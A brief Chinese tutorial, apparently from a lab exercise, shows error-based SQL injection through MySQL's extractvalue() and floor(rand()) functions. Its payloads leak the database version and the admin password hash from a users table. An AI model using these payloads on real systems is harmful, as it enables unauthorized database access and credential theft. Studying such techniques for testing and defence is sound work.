注入基于函数报错extractvalue(),floor()-字符型

基于extractvalue()

在这里插入图片描述

爆出数据库版本payload语句:
kobe' and extractvalue(0,concat(0x7e,version()))#

爆出数据库版本 在这里插入图片描述

基于floor()

floor()函数就是取整数 在这里插入图片描述

爆出数据版本信息

kobe' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

如图所示: 在这里插入图片描述

将上面的payload语句中的version()换一个获取对应密码的payload语句

kobe' and (select 2 from (select count(*),concat((select password from users where username='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

如果所示,md5值加密的密码信息 在这里插入图片描述